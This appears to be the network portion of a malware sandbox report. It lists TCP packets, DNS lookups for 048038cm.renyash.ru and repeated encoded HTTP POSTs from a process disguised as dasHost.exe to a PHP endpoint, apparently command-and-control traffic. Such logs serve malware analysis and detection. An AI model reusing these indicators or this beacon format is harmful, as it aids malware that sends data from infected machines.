                                                                        Dec 28, 2024 20:44:31.290111065 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.697618961 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.698669910 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:31.784794092 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.818134069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:31.907337904 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.031336069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.031521082 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.037031889 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.111882925 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.151019096 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.151156902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.199748039 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.199748993 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.319322109 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.319408894 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.319562912 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.319731951 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.322644949 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.443028927 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.566811085 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.570915937 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.674146891 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:32.690459013 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.793737888 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.793752909 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.793776035 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.903656006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:32.906251907 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:33.026032925 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:33.026102066 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:33.435112953 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:33.436186075 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:33.489902020 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:33.704258919 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:33.782475948 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:33.813616991 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.015142918 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.015465975 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.015517950 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.015588999 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.015630007 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.015693903 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.017652988 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.017677069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.017714024 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.137315989 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.138138056 CET4999580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.229058027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.257210016 CET8049991104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.257576942 CET8049995104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.257658005 CET4999180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.257708073 CET4999580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.257792950 CET4999580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.313586950 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.377243996 CET8049995104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.439912081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.442748070 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.565922976 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.614145041 CET4999580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.733855009 CET8049995104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.733887911 CET8049995104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.733931065 CET8049995104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.778687000 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.782274008 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:34.901741028 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:34.901859999 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.306447983 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.307409048 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:35.427032948 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.435101986 CET8049995104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.563824892 CET4999580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:35.639939070 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.640129089 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:35.689105034 CET8049995104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.760191917 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.760217905 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.810600042 CET4999580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:35.811341047 CET5000080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:35.932624102 CET8049995104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.932686090 CET4999580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:35.933026075 CET8050000104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:35.933085918 CET5000080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:35.933182955 CET5000080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:36.054918051 CET8050000104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.164700031 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.165503025 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:36.282404900 CET5000080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:36.519407988 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:36.610482931 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:36.610506058 CET5000080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:36.733344078 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.733494043 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:36.733930111 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.735337973 CET8050000104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.735502005 CET8050000104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.735569000 CET8050000104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.736974001 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.736984968 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.737101078 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.737111092 CET8050000104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:36.947771072 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.019840956 CET8050000104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.110475063 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.157984018 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.159466982 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.205683947 CET5000080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.258095026 CET8050000104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.279022932 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.313585997 CET5000080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.377345085 CET5000080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.377861977 CET5000480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.491868019 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.492037058 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.499924898 CET8050004104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.499977112 CET5000480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.500103951 CET8050000104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.500144005 CET5000080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.500195026 CET5000480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.616852045 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.616924047 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.625067949 CET8050004104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.845014095 CET5000480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:37.971271992 CET8050004104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.971297026 CET8050004104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:37.971317053 CET8050004104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:38.021935940 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:38.022661924 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:38.142406940 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:38.356234074 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:38.356365919 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:38.476135015 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:38.476154089 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:38.592981100 CET8050004104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:38.802151918 CET5000480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:38.826888084 CET8050004104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:38.887120008 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:38.889942884 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:38.910144091 CET5000480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:38.973758936 CET5000480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:38.974708080 CET5000780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:39.009524107 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.093651056 CET8050004104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.094150066 CET8050007104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.094177008 CET5000480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:39.094268084 CET5000780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:39.094348907 CET5000780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:39.213769913 CET8050007104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.222229004 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.222359896 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:39.341831923 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.341983080 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.438631058 CET5000780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:39.558206081 CET8050007104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.558250904 CET8050007104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.558279037 CET8050007104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.748258114 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:39.749033928 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:39.868590117 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.081526041 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.081661940 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.201322079 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.201416969 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.271938086 CET8050007104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.408171892 CET5000780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.525149107 CET8050007104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.563740969 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.564562082 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.610476971 CET5000780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.637562990 CET5001380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.637563944 CET5000780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.684041023 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.757114887 CET8050013104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.757210970 CET5001380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.757334948 CET5001380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.757572889 CET8050007104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.758229017 CET5000780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.876776934 CET8050013104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:40.923037052 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:40.983867884 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.110474110 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:41.110549927 CET5001380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:41.184077978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.184089899 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.230261087 CET8050013104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.230271101 CET8050013104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.230340004 CET8050013104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.409390926 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.410557985 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:41.530167103 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.743081093 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.743278027 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:41.863050938 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.863069057 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:41.887303114 CET8050013104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:42.016726017 CET5001380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:42.133778095 CET8050013104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:42.204827070 CET5001380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:42.251514912 CET5001380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:42.252151012 CET5001980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:42.270488024 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:42.271317959 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:42.371412992 CET8050013104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:42.371609926 CET5001380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:42.371614933 CET8050019104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:42.371784925 CET5001980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:42.371784925 CET5001980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:42.390748024 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:42.491282940 CET8050019104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:42.604046106 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:42.704277992 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:43.503674984 CET8050019104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:43.610502958 CET5001980192.168.2.4104.21.38.84

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 28, 2024 20:42:30.411755085 CET6249353192.168.2.41.1.1.1
                                                                        Dec 28, 2024 20:42:30.779380083 CET53624931.1.1.1192.168.2.4
                                                                        Dec 28, 2024 20:42:48.014177084 CET5691653192.168.2.41.1.1.1
                                                                        Dec 28, 2024 20:42:48.151943922 CET53569161.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 28, 2024 20:42:30.411755085 CET192.168.2.41.1.1.10x8f33Standard query (0)048038cm.renyash.ruA (IP address)IN (0x0001)false
                                                                        Dec 28, 2024 20:42:48.014177084 CET192.168.2.41.1.1.10xa3d5Standard query (0)048038cm.renyash.ruA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 28, 2024 20:42:30.779380083 CET1.1.1.1192.168.2.40x8f33No error (0)048038cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false
                                                                        Dec 28, 2024 20:42:30.779380083 CET1.1.1.1192.168.2.40x8f33No error (0)048038cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false
                                                                        Dec 28, 2024 20:42:48.151943922 CET1.1.1.1192.168.2.40xa3d5No error (0)048038cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false
                                                                        Dec 28, 2024 20:42:48.151943922 CET1.1.1.1192.168.2.40xa3d5No error (0)048038cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • 048038cm.renyash.ru

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449734104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:30.927011013 CET329OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 344
                                                                        Expect: 100-continue
                                                                        Connection: Keep-Alive
                                                                        Dec 28, 2024 20:42:31.283746004 CET344OUTData Raw: 05 07 01 01 03 08 01 0b 05 06 02 01 02 04 01 04 00 04 05 0a 02 00 03 0e 02 56 0d 0d 06 03 03 53 0a 05 04 0e 03 01 05 04 0d 0b 04 0b 05 00 06 03 03 00 0d 0f 0f 07 01 06 06 05 04 04 07 0b 07 5a 01 00 0f 09 07 51 04 04 0f 02 0e 54 0f 54 0c 51 04 06
                                                                        Data Ascii: VSZQTTQ[\L~CpTt}Ou[hlytR|`x|H{`u_hS^tt\e~V@@{CTO~ri
                                                                        Dec 28, 2024 20:42:32.156630039 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:32.399333000 CET1236INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Z%2BC9rMS1ebzyY9L%2B6ZexTbibDNeYD2Epuu35yhpEQLD01%2FDkcNxp%2Fk7YlvuqyvNz11qTawauN9rgWGUFPTnR7SrHeCYfcs1qRFQscUGpRkQWvhMJMpa9ZP5IMdDQzC9UMas4%2FBQ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408b9fc7c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3534&min_rtt=1756&rtt_var=4215&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=673&delivery_rate=91347&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 35 35 34 0d 0a 56 4a 7d 59 7b 43 64 5e 7b 62 7b 5d 7e 72 7b 4a 7e 49 5d 0d 7e 60 65 41 7b 63 77 58 7d 72 64 00 76 63 7d 0a 6e 5f 69 03 75 58 74 4a 69 71 78 01 55 4b 71 40 63 71 67 03 7f 04 61 04 68 59 62 0b 78 76 7c 09 7e 5d 6b 47 75 04 7d 04 60 07 71 03 7f 71 61 5a 6a 7c 70 08 6a 77 7b 07 62 5c 7b 06 7c 5b 6d 04 7d 73 71 44 6c 5e 74 05 6f 01 60 01 78 7d 5e 5a 79 71 73 5b 7b 70 61 5c 7c 4e 5a 01 78 49 51 58 6a 04 63 02 61 4f 52 02 7a 51 41 5b 7d 74 60 40 68 61 5f 43 75 42 63 5e 78 52 55 58 77 06 7a 43 6e 71 62 58 7d 7c 50 4f 78 71 65 5c 76 4d 51 4b 62 71 7c 06 74 71 54 50 7e 5d 79 5f 60 5b 7d 00 76 66 6c 09 7f 55 76 5d 77 6f 6b 5d 7f 60 7c 06 78 6f 7b 03 6f 59 76 00 6b 6d 68 08 77 77 6c 07 69 62 6e 09 7e 6e 63 0a 6c 43 54 41 69 04 75 4f 7b 5d 46 51 68 52 74 41 7f 63 7b 50 6a 5e 72 00 7b 7d 73 4a 6f 62 7c 01 7f 4f 68 5a 7d 49 70 51 7c 70 69 09 7b 73 6b 5f 7f 72 56 00 74 05 65 51 7b 5c 79 4a 75 76 7c 48 7e 76 52 4f 7e 48 5f 0d 74 72 67 07 7f 4c 5b 00 7f 67 6a 0b 7b 66 60 4f 7d 5d 55 47 76 62 53 41 76 [TRUNCATED]
                                                                        Data Ascii: 554VJ}Y{Cd^{b{]~r{J~I]~`eA{cwX}rdvc}n_iuXtJiqxUKq@cqgahYbxv|~]kGu}`qqaZj|pjw{b\{|[m}sqDl^to`x}^Zyqs[{pa\|NZxIQXjcaORzQA[}t`@ha_CuBc^xRUXwzCnqbX}|POxqe\vMQKbq|tqTP~]y_`[}vflUv]wok]`|xo{oYvkmhwwlibn~nclCTAiuO{]FQhRtAc{Pj^r{}sJob|OhZ}IpQ|pi{sk_rVteQ{\yJuv|H~vRO~H_trgL[gj{f`O}]UGvbSAvqa~aT~BR~YKvOQG{rq}NSKxgxLxghOxCgIyrpH{cn|^pxgl}\{@v_|H}R{K|wZB|O}@w|px|twpzyOS}lTOzqrvcwvO
                                                                        Dec 28, 2024 20:42:32.399419069 CET933INData Raw: 64 4c 74 61 5c 4e 7c 5e 6a 05 77 4c 71 00 76 65 74 0d 7f 6c 75 07 77 7c 78 00 7f 73 74 07 79 7c 67 45 7a 60 54 02 7f 6d 5e 4e 77 77 7c 03 7d 5c 6e 08 7e 6d 63 4f 7b 7d 54 41 7d 5c 61 4d 7f 4e 60 0c 7c 6c 5e 0a 7d 60 60 4f 7d 49 72 00 7b 53 7b 06
                                                                        Data Ascii: dLta\N|^jwLqvetluw|xsty|gEz`Tm^Nww|}\n~mcO{}TA}\aMN`|l^}``O}Ir{S{{LZH|a|w@pq{sZb^t]ezaWwfd}fp}X}w\\yIzA{XZ~sIvL[tai|q~I}l^ggJwq{JxLu}paK{w`LygRx}szr^K{s\L{]NZlwQ[|acNwblilQH}wkSbyuUw_{|`Ivp}SyraH|
                                                                        Dec 28, 2024 20:42:32.466384888 CET305OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 384
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:32.798706055 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:32.798875093 CET384OUTData Raw: 53 52 59 5f 56 45 55 5b 5d 5f 52 56 5a 5f 58 5f 57 5e 5f 50 54 55 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SRY_VEU[]_RVZ_X_W^_PTUUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'?Z!5#$8!--=['T49>+Z,*+]! +^(<%\ ![(
                                                                        Dec 28, 2024 20:42:33.291346073 CET957INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlqQMUDrn32J4G6%2FG5UAmZpoQqcYDnmH1v1upC0EMeVvUO8BM6JhWEEvXjIMPIzDKUV2mNnV3O0NTYsf%2FE2z3uBZk6mKe240D3HJ99Uy3CpYuTfbWbft869eXxaMOwzngM8U1%2BkH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408bdf8a242cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4693&min_rtt=1753&rtt_var=5452&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2219&recv_bytes=1362&delivery_rate=2445561&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
